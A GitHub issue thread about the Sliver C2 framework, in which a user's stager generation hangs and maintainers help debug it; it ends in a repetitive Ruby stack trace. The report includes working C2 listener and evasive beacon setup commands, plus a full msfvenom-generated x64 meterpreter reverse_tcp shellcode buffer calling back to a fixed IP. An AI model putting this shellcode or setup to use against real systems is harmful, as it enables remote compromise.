Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stager generation always crash whereas it works with msfvenom #1289

Closed
n3rada opened this issue Jun 10, 2023 · 19 comments
Closed

Stager generation always crash whereas it works with msfvenom #1289

n3rada opened this issue Jun 10, 2023 · 19 comments

Comments

@n3rada
Copy link
Contributor

n3rada commented Jun 10, 2023

My machine

Kali VMware guest

From uname -a:

Linux kali 6.1.0-kali9-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.27-1kali1 (2023-05-12) x86_64 GNU/Linux

Sliver installation

I have done sliver installation directly with the best way: curl https://sliver.sh/install|sudo bash
I do not forgot to install MinGW: apt install git mingw-w64

Then, I start it with:

sudo systemctl start sliver
sliver

My sliver version: Server v1.5.39 - af46878f8520c0c65bbb1e80d813a9658ba09188
My metasploit version: metasploit v6.3.19-dev

Step to reproduce

sliver > mtls --lport 443
sliver > profiles new beacon --mtls 10.10.16.173:443 --evasion --format shellcode --os windows --arch amd64 win64
sliver > stage-listener --url tcp://10.10.16.173:8443 --profile win64
sliver > generate stager --lhost 10.10.16.173 --lport 8443 --arch amd64 --format c --save /tmp

And this is at this moment than everything goes wrong. This runs for quite a long time... Like, really long time! When I say a long time it is more than 10 minutes. So after infinite run, i need to stop it.

Here is the output of the sliver.log file:

INFO[2023-06-10T21:24:22+02:00] [sliver/server/rpc/rpc-generate.go:201] Saving new profile with name "win64"
INFO[2023-06-10T21:24:22+02:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:220] finished unary call with code OK
INFO[2023-06-10T21:24:22+02:00] [sliver/server/c2/tcp-stager.go:34] Starting Raw TCP listener on 0.0.0.0:8443
INFO[2023-06-10T21:24:22+02:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:220] finished unary call with code OK
INFO[2023-06-10T21:25:55+02:00] [sliver/server/msf/msf.go:198] msfvenom [--platform windows --arch x64 --format c --payload windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.173 LPORT=8443 EXITFUNC=thread]
INFO[2023-06-10T21:40:21+02:00] [google.golang.org/grpc@v1.55.0/internal/grpclog/grpclog.go:37] [transport] [server-transport 0xc0001e49c0] Closing: EOF
WARN[2023-06-10T21:40:21+02:00] [sliver/server/rpc/rpc-tunnel.go:126] Error on stream recv rpc error: code = Canceled desc = context canceled
INFO[2023-06-10T21:40:21+02:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:220] finished streaming call with code Canceled
INFO[2023-06-10T21:40:21+02:00] [sliver/server/rpc/rpc-events.go:23] 1 client disconnected
INFO[2023-06-10T21:40:21+02:00] [google.golang.org/grpc@v1.55.0/internal/grpclog/grpclog.go:37] [transport] [server-transport 0xc0001e49c0] loopyWriter exiting with error: transport closed by client
INFO[2023-06-10T21:40:21+02:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:220] finished streaming call with code OK
INFO[2023-06-10T21:40:24+02:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:220] finished unary call with code OK

And of course, if i run the msfvenom command by myself, it works:

$ msfvenom --platform windows --arch x64 --format c --payload windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.173 LPORT=8443 EXITFUNC=thread
No encoder specified, outputting raw payload
Payload size: 511 bytes
Final size of c file: 2179 bytes
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x4d\x31\xc9\x48\x0f"
"\xb7\x4a\x4a\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41"
"\x51\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"
"\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x8b\x48\x18\x49\x01"
"\xd0\x50\xe3\x56\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88"
"\x48\x01\xd6\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1"
"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58\x41\x58"
"\x5e\x59\x48\x01\xd0\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"
"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"
"\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"
"\x89\xe5\x49\xbc\x02\x00\x20\xfb\x0a\x0a\x10\xad\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"
"\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"
"\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"
"\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"
"\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"
"\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"
"\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"
"\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"
"\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"
"\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"
"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"
"\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"
"\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"
"\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"
"\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\xbb\xe0\x1d"
"\x2a\x0a\x41\x89\xda\xff\xd5";

Maybe I'm doing something wrong, and if so it would be great because the solution would be easy. But I don't see what could be wrong.

Thank you

Thank you in advance for all the work you do, I'd be delighted to be able to contribute in the near future.

@moloch--
Copy link
Member

Looks like you're missing --prepend-size

@n3rada
Copy link
Contributor Author

n3rada commented Jun 12, 2023

The use of --prepend-size is useful when I want to bring my own stager from what I understand from reading the documentation on stagers, is that all? I just wanted to create a staging listener and link it to the profile. Using msfconsole inside is not my prerequisite. I'd prefer everything to work in sliver.

If I've done something wrong, could you please explain where my misunderstanding was?

@rkervella
Copy link
Member

rkervella commented Jun 12, 2023

Looks like an issue with kali/msfvenom. I think I've seen it recently too. In the meantime, you can just use msfvenom out of the box if that works, that's what Sliver does in the end.

@n3rada
Copy link
Contributor Author

n3rada commented Jun 12, 2023

Won't sliver obscure shellcode and other steps? Would you like me to generate other results to help you?

@rkervella
Copy link
Member

Won't sliver obscure shellcode and other steps? Would you like me to generate other results to help you?

Nothing fancy happening here, as you can see in the logs, the command is just:

 msfvenom --platform windows --arch x64 --format c --payload windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.173 LPORT=8443 EXITFUNC=thread

It was added as a convenience wrapper but that's all it does.

@n3rada
Copy link
Contributor Author

n3rada commented Jun 12, 2023

And this little wrapper that runs ad infinitum, wouldn't that be more of a problem with the Go installed on my side then?

For the time being, you advise me to use msfvenom directly, so that's what I'm going to do. Thank you very much for your time. Let me know if you haven't forgotten by then.

And what about the --preprend-size thing?

@n3rada
Copy link
Contributor Author

n3rada commented Jun 12, 2023

The documentation says that there is some "Compile-time obfuscation" tho'. How could I get this kind of obfuscation process if I am obliged to do the thing with msfvenom only? Don't you use Donut or something similar?

@rkervella
Copy link
Member

The "Compile-time obfuscation" mentioned in the readme is performed on the Sliver payload, not the MSF stager. The whole process looks like this:

  • the sliver server will generate a implant executable with Garble (compile time obfuscator)
  • the output is a PE executable that we pass to go-donut
  • the output of that step is the shellcode served by stage-listener in your case

The --prepend-size flag is here to tell the generate stager command to prepend the size of the shellcode to the shellcode itself, because that's what's expected from the metasploit stager.

@rkervella
Copy link
Member

rkervella commented Jun 15, 2023

@n3rada I'm unable to reproduce on a fresh ubuntu system with the latest metasploit version installed from https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html :

ubuntu:~$ sliver
Connecting to localhost:31337 ...

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain improvise
[*] Server v1.5.39 - af46878f8520c0c65bbb1e80d813a9658ba09188
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > generate stager --lhost 10.10.16.173 --lport 8443 --arch amd64 --format c --save /tmp

[*] Sliver implant stager saved to: /tmp/ADVANCED_LINGUISTICS

sliver > ^D
ubuntu:~$ cat /tmp/ADVANCED_LINGUISTICS
unsigned char buf[] =
...
ubuntu:~$ msfconsole --version
Framework Version: 6.3.21-dev-

Make sure you go through the initial metasploit setup once it's installed, I noticed msfvenom would prompt me to setup the database at first launch.

@n3rada
Copy link
Contributor Author

n3rada commented Jun 16, 2023

I'm on a fairly fresh installation of a Kali Linux (about a week old), so no strange relics persist on this VM. What other information might be useful?

image

@n3rada
Copy link
Contributor Author

n3rada commented Jun 16, 2023

Look at this @rkervella! After letting it run for a while, here's an interesting log:

INFO[2023-06-16T08:09:14+02:00] [sliver/server/msf/msf.go:205] /usr/bin/msfvenom --platform windows --arch x64 --format c --payload windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.173 LPORT=8443 EXITFUNC=thread 
INFO[2023-06-16T08:09:14+02:00] [sliver/server/msf/msf.go:207] --- stdout ---
 
INFO[2023-06-16T08:09:14+02:00] [sliver/server/msf/msf.go:208] --- stderr ---
<internal:dir>:98:in `open': Too many levels of symbolic links @ dir_initialize - /usr/lib/llvm-15/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Debug+Asserts/build/Release/build/Debug+Asserts/build/Debug+Asserts/build/Release/build/Release/build/Debug+Asserts/build/Release/build/Release/build/lib/clang/15.0.7 (Errno::ELOOP)
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
